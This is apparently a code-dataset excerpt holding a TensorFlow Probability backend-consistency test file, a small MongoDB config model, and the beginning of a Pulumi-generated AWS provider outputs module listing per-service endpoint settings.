    self.assertAllEqualNested(
        self.evaluate(tf.foldl(fn, elems, initializer=init)),
        nptf.foldl(fn, elems, initializer=init))

  def test_pfor(self):
    self.assertAllEqual(
        self.evaluate(tf_pfor.pfor(lambda x: tf.ones([]), 7)),
        np_pfor.pfor(lambda x: nptf.ones([]), 7))

  def test_pfor_with_closure(self):
    val = np.arange(7.)[:, np.newaxis]
    tf_val = tf.constant(val)

    def tf_fn(x):
      return tf.gather(tf_val, x)**2

    def np_fn(x):
      return nptf.gather(val, x)**2

    self.assertAllEqual(
        self.evaluate(tf_pfor.pfor(tf_fn, 7)),
        np_pfor.pfor(np_fn, 7))

  def test_pfor_with_closure_multi_out(self):
    val = np.arange(7.)[:, np.newaxis]
    tf_val = tf.constant(val)

    def tf_fn(x):
      return tf.gather(tf_val, x)**2, tf.gather(tf_val, x)

    def np_fn(x):
      return nptf.gather(val, x)**2, nptf.gather(val, x)

    self.assertAllEqual(
        self.evaluate(tf_pfor.pfor(tf_fn, 7)),
        np_pfor.pfor(np_fn, 7))

  def test_convert_variable_to_tensor(self):
    # Converting must snapshot the value: a later `assign` to the variable
    # should not be visible through the previously-converted tensor.
    v = nptf.Variable([0., 1., 2.], dtype=tf.float64)
    x = nptf.convert_to_tensor(v)
    v.assign([3., 3., 3.])
    self.assertEqual(type(np.array([0.])), type(x))
    self.assertEqual(np.float64, x.dtype)
    self.assertAllEqual([0., 1., 2.], x)

  def test_get_static_value(self):
    x = nptf.get_static_value(nptf.zeros((3, 2), dtype=nptf.float32))
    self.assertEqual(onp.ndarray, type(x))
    self.assertAllEqual(onp.zeros((3, 2), dtype=np.float32), x)
    # Variables are mutable, so they have no static value.
    self.assertIsNone(nptf.get_static_value(nptf.Variable(0.)))

  def evaluate(self, tensors):
    """Evaluates `tensors`, reusing the default session in graph mode."""
    if tf.executing_eagerly():
      return self._eval_helper(tensors)
    else:
      sess = tf1.get_default_session()
      if sess is None:
        with self.session() as sess:
          return sess.run(tensors)
      else:
        return sess.run(tensors)

  @parameterized.named_parameters(NUMPY_TEST_CASES)
  def testLogEmptyTestCases(self,
                            tensorflow_function,
                            numpy_function,
                            strategy_list,
                            xla_disabled=False,
                            **_):
    # Make sure we have logs recording which of the NUMPY_TEST_CASES
    # aren't running, and why. The skipTest flags to anyone
    # investigating which individual methods' logs might be worth
    # checking.
    if xla_disabled and FLAGS.test_mode == 'xla':
      logging.warning(
          'The test for %s is disabled on XLA.', numpy_function.__name__)
      self.skipTest('Disabled.')
    if not strategy_list:
      logging.warning(
          'The test for %s contains no strategies.', numpy_function.__name__)
      self.skipTest('No strategies.')
    else:
      pass

  def tpu_strategy(self):  # For TPU testing.
    """Returns a cached `TPUStrategy`, or `None` when not running on TPU."""
    if not FLAGS.use_tpu:
      return None
    if self._cached_strategy is None:
      tpu = tf.distribute.cluster_resolver.TPUClusterResolver('local')
      tf.config.experimental_connect_to_cluster(tpu)
      tf.tpu.experimental.initialize_tpu_system(tpu)
      self._cached_strategy = tf.distribute.TPUStrategy(tpu)
    return self._cached_strategy

  @parameterized.named_parameters(NUMPY_TEST_CASES)
  def testConsistency(self,
                      tensorflow_function,
                      numpy_function,
                      strategy_list,
                      atol=1e-5,
                      rtol=1e-5,
                      disabled=False,
                      xla_disabled=False,
                      xla_atol=None,
                      xla_rtol=None,
                      xla_const_args=(),
                      assert_shape_only=False,
                      post_processor=None,
                      jax_kwargs=lambda: {},
                      name=None):
    """Draws args from each strategy and compares TF vs. rewritten outputs."""
    if disabled:
      self.skipTest('Test is disabled.')
    if name in FLAGS.xla_disabled:
      xla_disabled = True
    if (xla_disabled ^ FLAGS.only_disabled) and FLAGS.test_mode == 'xla':
      self.skipTest('Test is disabled.')
    if FLAGS.test_mode == 'xla':
      rtol = rtol if xla_rtol is None else xla_rtol
      atol = atol if xla_atol is None else xla_atol

    for strategy in strategy_list:

      @tfp_hps.tfp_hp_settings(max_examples=10, derandomize=True)
      @hp.given(strategy)
      def check_consistency(tf_fn, np_fn, args):
        # If `args` is a single item, put it in a tuple
        if isinstance(args, (onp.ndarray, np.ndarray)) or tf.is_tensor(args):
          args = (args,)
        kwargs = {}
        if isinstance(args, Kwargs):
          kwargs = args
          args = ()
        tensorflow_value = self.evaluate(
            tf_fn(*_maybe_convert_to_tensors(args),
                  **_maybe_convert_to_tensors(kwargs)))
        if FLAGS.test_mode == 'xla':
          # Args marked const must be passed as Python constants (not
          # tensors) into the compiled function; close over them instead.
          zero = tf.zeros([])
          const_args = tuple(
              [a if i in xla_const_args else None for i, a in enumerate(args)])
          nonconst_args = tuple(
              [zero if i in xla_const_args else a for i, a in enumerate(args)])
          const_kwargs = {
              k: v for k, v in kwargs.items() if k in xla_const_args}
          nonconst_kwargs = {
              k: zero if k in xla_const_args else v for k, v in kwargs.items()}
          args = _maybe_convert_to_tensors(nonconst_args)
          kwargs = _maybe_convert_to_tensors(nonconst_kwargs)

          def const_closure(*args, **kwargs):
            args = [const_args[i] if i in xla_const_args else arg
                    for i, arg in enumerate(args)]
            kwargs = dict(kwargs, **const_kwargs)
            return tf_fn(*args, **kwargs)

          tpu_strategy = self.tpu_strategy()
          if tpu_strategy is None:
            alt_value = self.evaluate(
                tf.function(
                    lambda args, kwargs: const_closure(*args, **kwargs),
                    jit_compile=True)(nonconst_args, nonconst_kwargs))
          else:
            alt_value = self.evaluate(
                tpu_strategy.run(tf.function(const_closure),
                                 args=nonconst_args, kwargs=nonconst_kwargs))
            alt_value = tf.nest.map_structure(lambda t: t.values[0], alt_value)
        else:
          kwargs.update(jax_kwargs() if JAX_MODE else {})
          alt_value = np_fn(*args, **kwargs)

        def assert_same_dtype(x, y):
          self.assertEqual(dtype_util.as_numpy_dtype(x.dtype),
                           dtype_util.as_numpy_dtype(y.dtype))
        tf.nest.map_structure(assert_same_dtype, tensorflow_value, alt_value)

        if post_processor is not None:
          alt_value = post_processor(alt_value)
          tensorflow_value = post_processor(tensorflow_value)

        if assert_shape_only:

          def assert_same_shape(x, y):
            self.assertAllEqual(x.shape, y.shape)

          tf.nest.map_structure(assert_same_shape, tensorflow_value, alt_value)
        else:
          for i, (tf_val, alt_val) in enumerate(six.moves.zip_longest(
              tf.nest.flatten(tensorflow_value), tf.nest.flatten(alt_value))):
            self.assertAllCloseAccordingToType(
                tf_val, alt_val, atol=atol, rtol=rtol,
                msg='output {}'.format(i))

      check_consistency(tensorflow_function, numpy_function)

  def test_can_flatten_linear_operators(self):
    if NUMPY_MODE:
      # Fixed skip message: flattening relies on `jax.tree_util`, which is
      # unavailable in the NumPy backend (the old message said 'JAX backend').
      self.skipTest('Flattening not supported in NumPy backend.')
    from jax import tree_util  # pylint: disable=g-import-not-at-top

    self.assertLen(
        tree_util.tree_leaves(nptf.linalg.LinearOperatorIdentity(5)), 0)

    linop = nptf.linalg.LinearOperatorDiag(nptf.ones(5))
    self.assertLen(tree_util.tree_leaves(linop), 1)
    self.assertTupleEqual(tree_util.tree_leaves(linop)[0].shape, (5,))

    linop = nptf.linalg.LinearOperatorLowerTriangular(nptf.eye(5))
    self.assertLen(tree_util.tree_leaves(linop), 1)
    self.assertTupleEqual(tree_util.tree_leaves(linop)[0].shape, (5, 5))

    linop = nptf.linalg.LinearOperatorFullMatrix(nptf.eye(5))
    self.assertLen(tree_util.tree_leaves(linop), 1)
    self.assertTupleEqual(tree_util.tree_leaves(linop)[0].shape, (5, 5))

    linop1 = nptf.linalg.LinearOperatorDiag(nptf.ones(3))
    linop2 = nptf.linalg.LinearOperatorDiag(nptf.ones(4))
    linop = nptf.linalg.LinearOperatorBlockDiag([linop1, linop2])
    self.assertLen(tree_util.tree_leaves(linop), 2)
    self.assertListEqual([a.shape for a in tree_util.tree_leaves(linop)],
                         [(3,), (4,)])

    linop1 = nptf.linalg.LinearOperatorFullMatrix(nptf.ones([4, 3]))
    linop2 = nptf.linalg.LinearOperatorFullMatrix(nptf.ones([3, 2]))
    linop = nptf.linalg.LinearOperatorComposition([linop1, linop2])
    self.assertLen(tree_util.tree_leaves(linop), 2)
    self.assertListEqual([a.shape for a in tree_util.tree_leaves(linop)],
                         [(4, 3), (3, 2)])
if __name__ == '__main__':
  # A rewrite oddity: the test_util we import here doesn't come from a rewritten
  # dependency, so we need to tell it explicitly that it's meant to be for JAX
  # (it cannot infer the backend on its own).
  test_util.main(jax_mode=JAX_MODE)
| 38.555222 | 103 | 0.636794 |
96c08e44eb26db6aa55ebfad4debfa5af90cc581 | 634 | py | Python | app/models/config.py | francisye19/demo | 927cf6fdadbbaba64459ff59b521a95dbfae644a | [
"MIT"
] | null | null | null | app/models/config.py | francisye19/demo | 927cf6fdadbbaba64459ff59b521a95dbfae644a | [
"MIT"
] | null | null | null | app/models/config.py | francisye19/demo | 927cf6fdadbbaba64459ff59b521a95dbfae644a | [
"MIT"
] | 3 | 2017-01-10T09:19:40.000Z | 2018-11-09T10:40:52.000Z | # -*- coding: utf-8 -*-
"""
teammate
~~~~~~~~~~~~~~
Model config.
:copyright: (c) 2017 by fengweimin.
:date: 2017/2/28
"""
from datetime import datetime
from app.extensions import mdb
from app.mongosupport import Model
@mdb.register
class Config(Model):
    """Configuration document stored in the 'configs' MongoDB collection."""
    __collection__ = 'configs'
    structure = {
        'name': unicode,
        'createTime': datetime
    }
    # Configuration content is stored under dynamic (schemaless) fields.
    # NOTE: for now, dynamic field values can only be read/written via
    # __getitem__ / __setitem__.
    use_schemaless = True
    required_fields = ['name', 'createTime']
    default_values = {'createTime': datetime.now}
    # Each config is uniquely identified by its name.
    indexes = [{'fields': ['name'], 'unique': True}]
| 19.212121 | 52 | 0.624606 |
d1ef191b5d11cf16fd68ee1dcc4a946f91593be1 | 54,652 | py | Python | sdk/python/pulumi_aws/outputs.py | jen20/pulumi-aws | 172e00c642adc03238f89cc9c5a16b914a77c2b1 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_aws/outputs.py | jen20/pulumi-aws | 172e00c642adc03238f89cc9c5a16b914a77c2b1 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumi_aws/outputs.py | jen20/pulumi-aws | 172e00c642adc03238f89cc9c5a16b914a77c2b1 | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities, _tables
from ._enums import *
# Public API of this generated module: provider nested-configuration output
# types and data-source result/filter classes.
__all__ = [
    'ProviderAssumeRole',
    'ProviderDefaultTags',
    'ProviderEndpoint',
    'ProviderIgnoreTags',
    'GetAmiBlockDeviceMappingResult',
    'GetAmiFilterResult',
    'GetAmiIdsFilterResult',
    'GetAmiProductCodeResult',
    'GetAutoscalingGroupsFilterResult',
    'GetAvailabilityZoneFilterResult',
    'GetAvailabilityZonesFilterResult',
    'GetElasticIpFilterResult',
    'GetPrefixListFilterResult',
    'GetRegionsFilterResult',
]
@pulumi.output_type
class ProviderAssumeRole(dict):
    """Output type for the AWS provider's `assume_role` configuration block.

    Generated code: values are stored/read through `pulumi.set`/`pulumi.get`
    on the underlying dict, and `_translate_property` maps the camelCase wire
    names (e.g. `durationSeconds`) to the snake_case Python property names.
    All fields are optional.
    """
    def __init__(__self__, *,
                 duration_seconds: Optional[int] = None,
                 external_id: Optional[str] = None,
                 policy: Optional[str] = None,
                 policy_arns: Optional[Sequence[str]] = None,
                 role_arn: Optional[str] = None,
                 session_name: Optional[str] = None,
                 tags: Optional[Mapping[str, str]] = None,
                 transitive_tag_keys: Optional[Sequence[str]] = None):
        # Only explicitly-provided (non-None) values are stored.
        if duration_seconds is not None:
            pulumi.set(__self__, "duration_seconds", duration_seconds)
        if external_id is not None:
            pulumi.set(__self__, "external_id", external_id)
        if policy is not None:
            pulumi.set(__self__, "policy", policy)
        if policy_arns is not None:
            pulumi.set(__self__, "policy_arns", policy_arns)
        if role_arn is not None:
            pulumi.set(__self__, "role_arn", role_arn)
        if session_name is not None:
            pulumi.set(__self__, "session_name", session_name)
        if tags is not None:
            pulumi.set(__self__, "tags", tags)
        if transitive_tag_keys is not None:
            pulumi.set(__self__, "transitive_tag_keys", transitive_tag_keys)

    @property
    @pulumi.getter(name="durationSeconds")
    def duration_seconds(self) -> Optional[int]:
        return pulumi.get(self, "duration_seconds")

    @property
    @pulumi.getter(name="externalId")
    def external_id(self) -> Optional[str]:
        return pulumi.get(self, "external_id")

    @property
    @pulumi.getter
    def policy(self) -> Optional[str]:
        return pulumi.get(self, "policy")

    @property
    @pulumi.getter(name="policyArns")
    def policy_arns(self) -> Optional[Sequence[str]]:
        return pulumi.get(self, "policy_arns")

    @property
    @pulumi.getter(name="roleArn")
    def role_arn(self) -> Optional[str]:
        return pulumi.get(self, "role_arn")

    @property
    @pulumi.getter(name="sessionName")
    def session_name(self) -> Optional[str]:
        return pulumi.get(self, "session_name")

    @property
    @pulumi.getter
    def tags(self) -> Optional[Mapping[str, str]]:
        return pulumi.get(self, "tags")

    @property
    @pulumi.getter(name="transitiveTagKeys")
    def transitive_tag_keys(self) -> Optional[Sequence[str]]:
        return pulumi.get(self, "transitive_tag_keys")

    def _translate_property(self, prop):
        # Map camelCase wire names back to the snake_case property names.
        return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ProviderDefaultTags(dict):
    """Output type for the provider's `default_tags` configuration block.

    Generated code: holds an optional `tags` mapping applied via
    `pulumi.set`/`pulumi.get` on the underlying dict.
    """
    def __init__(__self__, *,
                 tags: Optional[Mapping[str, str]] = None):
        if tags is not None:
            pulumi.set(__self__, "tags", tags)

    @property
    @pulumi.getter
    def tags(self) -> Optional[Mapping[str, str]]:
        return pulumi.get(self, "tags")

    def _translate_property(self, prop):
        # Map camelCase wire names back to the snake_case property names.
        return _tables.CAMEL_TO_SNAKE_CASE_TABLE.get(prop) or prop
@pulumi.output_type
class ProviderEndpoint(dict):
    """
    Per-service custom endpoint configuration for the AWS provider.

    Each field holds a custom endpoint URL for the correspondingly named AWS
    service; a field left as ``None`` means the default AWS endpoint is used.
    """

    def __init__(__self__, *,
                 accessanalyzer: Optional[str] = None, acm: Optional[str] = None, acmpca: Optional[str] = None,
                 amplify: Optional[str] = None, apigateway: Optional[str] = None, applicationautoscaling: Optional[str] = None,
                 applicationinsights: Optional[str] = None, appmesh: Optional[str] = None, appstream: Optional[str] = None,
                 appsync: Optional[str] = None, athena: Optional[str] = None, auditmanager: Optional[str] = None,
                 autoscaling: Optional[str] = None, autoscalingplans: Optional[str] = None, backup: Optional[str] = None,
                 batch: Optional[str] = None, budgets: Optional[str] = None, cloud9: Optional[str] = None,
                 cloudformation: Optional[str] = None, cloudfront: Optional[str] = None, cloudhsm: Optional[str] = None,
                 cloudsearch: Optional[str] = None, cloudtrail: Optional[str] = None, cloudwatch: Optional[str] = None,
                 cloudwatchevents: Optional[str] = None, cloudwatchlogs: Optional[str] = None, codeartifact: Optional[str] = None,
                 codebuild: Optional[str] = None, codecommit: Optional[str] = None, codedeploy: Optional[str] = None,
                 codepipeline: Optional[str] = None, codestarconnections: Optional[str] = None, cognitoidentity: Optional[str] = None,
                 cognitoidp: Optional[str] = None, configservice: Optional[str] = None, connect: Optional[str] = None,
                 cur: Optional[str] = None, dataexchange: Optional[str] = None, datapipeline: Optional[str] = None,
                 datasync: Optional[str] = None, dax: Optional[str] = None, devicefarm: Optional[str] = None,
                 directconnect: Optional[str] = None, dlm: Optional[str] = None, dms: Optional[str] = None,
                 docdb: Optional[str] = None, ds: Optional[str] = None, dynamodb: Optional[str] = None,
                 ec2: Optional[str] = None, ecr: Optional[str] = None, ecrpublic: Optional[str] = None,
                 ecs: Optional[str] = None, efs: Optional[str] = None, eks: Optional[str] = None,
                 elasticache: Optional[str] = None, elasticbeanstalk: Optional[str] = None, elastictranscoder: Optional[str] = None,
                 elb: Optional[str] = None, emr: Optional[str] = None, emrcontainers: Optional[str] = None,
                 es: Optional[str] = None, firehose: Optional[str] = None, fms: Optional[str] = None,
                 forecast: Optional[str] = None, fsx: Optional[str] = None, gamelift: Optional[str] = None,
                 glacier: Optional[str] = None, globalaccelerator: Optional[str] = None, glue: Optional[str] = None,
                 greengrass: Optional[str] = None, guardduty: Optional[str] = None, iam: Optional[str] = None,
                 identitystore: Optional[str] = None, imagebuilder: Optional[str] = None, inspector: Optional[str] = None,
                 iot: Optional[str] = None, iotanalytics: Optional[str] = None, iotevents: Optional[str] = None,
                 kafka: Optional[str] = None, kinesis: Optional[str] = None, kinesisanalytics: Optional[str] = None,
                 kinesisanalyticsv2: Optional[str] = None, kinesisvideo: Optional[str] = None, kms: Optional[str] = None,
                 lakeformation: Optional[str] = None, lambda_: Optional[str] = None, lexmodels: Optional[str] = None,
                 licensemanager: Optional[str] = None, lightsail: Optional[str] = None, macie: Optional[str] = None,
                 macie2: Optional[str] = None, managedblockchain: Optional[str] = None, marketplacecatalog: Optional[str] = None,
                 mediaconnect: Optional[str] = None, mediaconvert: Optional[str] = None, medialive: Optional[str] = None,
                 mediapackage: Optional[str] = None, mediastore: Optional[str] = None, mediastoredata: Optional[str] = None,
                 mq: Optional[str] = None, mwaa: Optional[str] = None, neptune: Optional[str] = None,
                 networkfirewall: Optional[str] = None, networkmanager: Optional[str] = None, opsworks: Optional[str] = None,
                 organizations: Optional[str] = None, outposts: Optional[str] = None, personalize: Optional[str] = None,
                 pinpoint: Optional[str] = None, pricing: Optional[str] = None, qldb: Optional[str] = None,
                 quicksight: Optional[str] = None, ram: Optional[str] = None, rds: Optional[str] = None,
                 redshift: Optional[str] = None, resourcegroups: Optional[str] = None, resourcegroupstaggingapi: Optional[str] = None,
                 route53: Optional[str] = None, route53domains: Optional[str] = None, route53resolver: Optional[str] = None,
                 s3: Optional[str] = None, s3control: Optional[str] = None, s3outposts: Optional[str] = None,
                 sagemaker: Optional[str] = None, sdb: Optional[str] = None, secretsmanager: Optional[str] = None,
                 securityhub: Optional[str] = None, serverlessrepo: Optional[str] = None, servicecatalog: Optional[str] = None,
                 servicediscovery: Optional[str] = None, servicequotas: Optional[str] = None, ses: Optional[str] = None,
                 shield: Optional[str] = None, signer: Optional[str] = None, sns: Optional[str] = None,
                 sqs: Optional[str] = None, ssm: Optional[str] = None, ssoadmin: Optional[str] = None,
                 stepfunctions: Optional[str] = None, storagegateway: Optional[str] = None, sts: Optional[str] = None,
                 swf: Optional[str] = None, synthetics: Optional[str] = None, timestreamwrite: Optional[str] = None,
                 transfer: Optional[str] = None, waf: Optional[str] = None, wafregional: Optional[str] = None,
                 wafv2: Optional[str] = None, worklink: Optional[str] = None, workmail: Optional[str] = None,
                 workspaces: Optional[str] = None, xray: Optional[str] = None):
        # Every parameter receives identical handling, so iterate over the
        # captured keyword arguments instead of repeating ~300 lines of
        # `if x is not None: pulumi.set(...)` stanzas.  At this point
        # locals() contains exactly `__self__` plus the parameters, in
        # declaration order, and each parameter name (including `lambda_`)
        # is the same snake_case key the original code passed to pulumi.set.
        _args = dict(locals())
        _args.pop('__self__', None)
        for _name, _value in _args.items():
            if _value is not None:
                pulumi.set(__self__, _name, _value)

    @property
    @pulumi.getter
    def accessanalyzer(self) -> Optional[str]:
        return pulumi.get(self, "accessanalyzer")
    @property
    @pulumi.getter
    def acm(self) -> Optional[str]:
        return pulumi.get(self, "acm")
    @property
    @pulumi.getter
    def acmpca(self) -> Optional[str]:
        return pulumi.get(self, "acmpca")
    @property
    @pulumi.getter
    def amplify(self) -> Optional[str]:
        return pulumi.get(self, "amplify")
    @property
    @pulumi.getter
    def apigateway(self) -> Optional[str]:
        return pulumi.get(self, "apigateway")
    @property
    @pulumi.getter
    def applicationautoscaling(self) -> Optional[str]:
        return pulumi.get(self, "applicationautoscaling")
    @property
    @pulumi.getter
    def applicationinsights(self) -> Optional[str]:
        return pulumi.get(self, "applicationinsights")
    @property
    @pulumi.getter
    def appmesh(self) -> Optional[str]:
        return pulumi.get(self, "appmesh")
    @property
    @pulumi.getter
    def appstream(self) -> Optional[str]:
        return pulumi.get(self, "appstream")
    @property
    @pulumi.getter
    def appsync(self) -> Optional[str]:
        return pulumi.get(self, "appsync")
    @property
    @pulumi.getter
    def athena(self) -> Optional[str]:
        return pulumi.get(self, "athena")
    @property
    @pulumi.getter
    def auditmanager(self) -> Optional[str]:
        return pulumi.get(self, "auditmanager")
    @property
    @pulumi.getter
    def autoscaling(self) -> Optional[str]:
        return pulumi.get(self, "autoscaling")
    @property
    @pulumi.getter
    def autoscalingplans(self) -> Optional[str]:
        return pulumi.get(self, "autoscalingplans")
    @property
    @pulumi.getter
    def backup(self) -> Optional[str]:
        return pulumi.get(self, "backup")
    @property
    @pulumi.getter
    def batch(self) -> Optional[str]:
        return pulumi.get(self, "batch")
    @property
    @pulumi.getter
    def budgets(self) -> Optional[str]:
        return pulumi.get(self, "budgets")
    @property
    @pulumi.getter
    def cloud9(self) -> Optional[str]:
        return pulumi.get(self, "cloud9")
    @property
    @pulumi.getter
    def cloudformation(self) -> Optional[str]:
        return pulumi.get(self, "cloudformation")
    @property
    @pulumi.getter
    def cloudfront(self) -> Optional[str]:
        return pulumi.get(self, "cloudfront")
    @property
    @pulumi.getter
    def cloudhsm(self) -> Optional[str]:
        return pulumi.get(self, "cloudhsm")
    @property
    @pulumi.getter
    def cloudsearch(self) -> Optional[str]:
        return pulumi.get(self, "cloudsearch")
    @property
    @pulumi.getter
    def cloudtrail(self) -> Optional[str]:
        return pulumi.get(self, "cloudtrail")
    @property
    @pulumi.getter
    def cloudwatch(self) -> Optional[str]:
        return pulumi.get(self, "cloudwatch")
    @property
    @pulumi.getter
    def cloudwatchevents(self) -> Optional[str]:
        return pulumi.get(self, "cloudwatchevents")
    @property
    @pulumi.getter
    def cloudwatchlogs(self) -> Optional[str]:
        return pulumi.get(self, "cloudwatchlogs")
    @property
    @pulumi.getter
    def codeartifact(self) -> Optional[str]:
        return pulumi.get(self, "codeartifact")
    @property
    @pulumi.getter
    def codebuild(self) -> Optional[str]:
        return pulumi.get(self, "codebuild")
    @property
    @pulumi.getter
    def codecommit(self) -> Optional[str]:
        return pulumi.get(self, "codecommit")
    @property
    @pulumi.getter
    def codedeploy(self) -> Optional[str]:
        return pulumi.get(self, "codedeploy")
    @property
    @pulumi.getter
    def codepipeline(self) -> Optional[str]:
        return pulumi.get(self, "codepipeline")
    @property
    @pulumi.getter
    def codestarconnections(self) -> Optional[str]:
        return pulumi.get(self, "codestarconnections")
    @property
    @pulumi.getter
    def cognitoidentity(self) -> Optional[str]:
        return pulumi.get(self, "cognitoidentity")
    @property
    @pulumi.getter
    def cognitoidp(self) -> Optional[str]:
        return pulumi.get(self, "cognitoidp")
    @property
    @pulumi.getter
    def configservice(self) -> Optional[str]:
        return pulumi.get(self, "configservice")
    @property
    @pulumi.getter
    def connect(self) -> Optional[str]:
        return pulumi.get(self, "connect")
    @property
    @pulumi.getter
    def cur(self) -> Optional[str]:
        return pulumi.get(self, "cur")
    @property
    @pulumi.getter
    def dataexchange(self) -> Optional[str]:
        return pulumi.get(self, "dataexchange")
    @property
    @pulumi.getter
    def datapipeline(self) -> Optional[str]:
        return pulumi.get(self, "datapipeline")
    @property
    @pulumi.getter
    def datasync(self) -> Optional[str]:
        return pulumi.get(self, "datasync")
    @property
    @pulumi.getter
    def dax(self) -> Optional[str]:
        return pulumi.get(self, "dax")
    @property
    @pulumi.getter
    def devicefarm(self) -> Optional[str]:
        return pulumi.get(self, "devicefarm")
    @property
    @pulumi.getter
    def directconnect(self) -> Optional[str]:
        return pulumi.get(self, "directconnect")
    @property
    @pulumi.getter
    def dlm(self) -> Optional[str]:
        return pulumi.get(self, "dlm")
    @property
    @pulumi.getter
    def dms(self) -> Optional[str]:
        return pulumi.get(self, "dms")
    @property
    @pulumi.getter
    def docdb(self) -> Optional[str]:
        return pulumi.get(self, "docdb")
    @property
    @pulumi.getter
    def ds(self) -> Optional[str]:
        return pulumi.get(self, "ds")
    @property
    @pulumi.getter
    def dynamodb(self) -> Optional[str]:
        return pulumi.get(self, "dynamodb")
    @property
    @pulumi.getter
    def ec2(self) -> Optional[str]:
        return pulumi.get(self, "ec2")
    @property
    @pulumi.getter
    def ecr(self) -> Optional[str]:
        return pulumi.get(self, "ecr")
    @property
    @pulumi.getter
    def ecrpublic(self) -> Optional[str]:
        return pulumi.get(self, "ecrpublic")
    @property
    @pulumi.getter
    def ecs(self) -> Optional[str]:
        return pulumi.get(self, "ecs")
    @property
    @pulumi.getter
    def efs(self) -> Optional[str]:
        return pulumi.get(self, "efs")
    @property
    @pulumi.getter
    def eks(self) -> Optional[str]:
        return pulumi.get(self, "eks")
    @property
    @pulumi.getter
    def elasticache(self) -> Optional[str]:
        return pulumi.get(self, "elasticache")
    @property
    @pulumi.getter
    def elasticbeanstalk(self) -> Optional[str]:
        return pulumi.get(self, "elasticbeanstalk")
    @property
    @pulumi.getter
    def elastictranscoder(self) -> Optional[str]:
        return pulumi.get(self, "elastictranscoder")
    @property
    @pulumi.getter
    def elb(self) -> Optional[str]:
        return pulumi.get(self, "elb")
    @property
    @pulumi.getter
    def emr(self) -> Optional[str]:
        return pulumi.get(self, "emr")
    @property
    @pulumi.getter
    def emrcontainers(self) -> Optional[str]:
        return pulumi.get(self, "emrcontainers")
    @property
    @pulumi.getter
    def es(self) -> Optional[str]:
        return pulumi.get(self, "es")
    @property
    @pulumi.getter
    def firehose(self) -> Optional[str]:
        return pulumi.get(self, "firehose")
    @property
    @pulumi.getter
    def fms(self) -> Optional[str]:
        return pulumi.get(self, "fms")
    @property
    @pulumi.getter
    def forecast(self) -> Optional[str]:
        return pulumi.get(self, "forecast")
    @property
    @pulumi.getter
    def fsx(self) -> Optional[str]:
        return pulumi.get(self, "fsx")
    @property
    @pulumi.getter
    def gamelift(self) -> Optional[str]:
        return pulumi.get(self, "gamelift")
    @property
    @pulumi.getter
    def glacier(self) -> Optional[str]:
        return pulumi.get(self, "glacier")
    @property
    @pulumi.getter
    def globalaccelerator(self) -> Optional[str]:
        return pulumi.get(self, "globalaccelerator")
    @property
    @pulumi.getter
    def glue(self) -> Optional[str]:
        return pulumi.get(self, "glue")
    @property
    @pulumi.getter
    def greengrass(self) -> Optional[str]:
        return pulumi.get(self, "greengrass")
    @property
    @pulumi.getter
    def guardduty(self) -> Optional[str]:
        return pulumi.get(self, "guardduty")
    @property
    @pulumi.getter
    def iam(self) -> Optional[str]:
        return pulumi.get(self, "iam")
    @property
    @pulumi.getter
    def identitystore(self) -> Optional[str]:
        return pulumi.get(self, "identitystore")
    @property
    @pulumi.getter
    def imagebuilder(self) -> Optional[str]:
        return pulumi.get(self, "imagebuilder")
    @property
    @pulumi.getter
    def inspector(self) -> Optional[str]:
        return pulumi.get(self, "inspector")
    @property
    @pulumi.getter
    def iot(self) -> Optional[str]:
        return pulumi.get(self, "iot")
    @property
    @pulumi.getter
    def iotanalytics(self) -> Optional[str]:
        return pulumi.get(self, "iotanalytics")
    @property
    @pulumi.getter
    def iotevents(self) -> Optional[str]:
        return pulumi.get(self, "iotevents")
    @property
    @pulumi.getter
    def kafka(self) -> Optional[str]:
        return pulumi.get(self, "kafka")
    @property
    @pulumi.getter
    def kinesis(self) -> Optional[str]:
        return pulumi.get(self, "kinesis")
    @property
    @pulumi.getter
    def kinesisanalytics(self) -> Optional[str]:
        return pulumi.get(self, "kinesisanalytics")
    @property
    @pulumi.getter
    def kinesisanalyticsv2(self) -> Optional[str]:
        return pulumi.get(self, "kinesisanalyticsv2")
    @property
    @pulumi.getter
    def kinesisvideo(self) -> Optional[str]:
        return pulumi.get(self, "kinesisvideo")
    @property
    @pulumi.getter
    def kms(self) -> Optional[str]:
        return pulumi.get(self, "kms")
    @property
    @pulumi.getter
    def lakeformation(self) -> Optional[str]:
        return pulumi.get(self, "lakeformation")
    @property
    @pulumi.getter(name="lambda")
    def lambda_(self) -> Optional[str]:
        # `lambda` is a Python keyword, so the attribute carries a trailing
        # underscore while the wire name stays "lambda".
        return pulumi.get(self, "lambda_")
    @property
    @pulumi.getter
    def lexmodels(self) -> Optional[str]:
        return pulumi.get(self, "lexmodels")
    @property
    @pulumi.getter
    def licensemanager(self) -> Optional[str]:
        return pulumi.get(self, "licensemanager")
    @property
    @pulumi.getter
    def lightsail(self) -> Optional[str]:
        return pulumi.get(self, "lightsail")
    @property
    @pulumi.getter
    def macie(self) -> Optional[str]:
        return pulumi.get(self, "macie")
    @property
    @pulumi.getter
    def macie2(self) -> Optional[str]:
        return pulumi.get(self, "macie2")
    @property
    @pulumi.getter
    def managedblockchain(self) -> Optional[str]:
        return pulumi.get(self, "managedblockchain")
    @property
    @pulumi.getter
    def marketplacecatalog(self) -> Optional[str]:
        return pulumi.get(self, "marketplacecatalog")
    @property
    @pulumi.getter
    def mediaconnect(self) -> Optional[str]:
        return pulumi.get(self, "mediaconnect")
    @property
    @pulumi.getter
    def mediaconvert(self) -> Optional[str]:
        return pulumi.get(self, "mediaconvert")
    @property
    @pulumi.getter
    def medialive(self) -> Optional[str]:
        return pulumi.get(self, "medialive")
    @property
    @pulumi.getter
    def mediapackage(self) -> Optional[str]:
        return pulumi.get(self, "mediapackage")
    @property
    @pulumi.getter
    def mediastore(self) -> Optional[str]:
        return pulumi.get(self, "mediastore")
    @property
    @pulumi.getter
    def mediastoredata(self) -> Optional[str]:
        return pulumi.get(self, "mediastoredata")
    @property
    @pulumi.getter
    def mq(self) -> Optional[str]:
        return pulumi.get(self, "mq")
    @property
    @pulumi.getter
    def mwaa(self) -> Optional[str]:
        return pulumi.get(self, "mwaa")
    @property
    @pulumi.getter
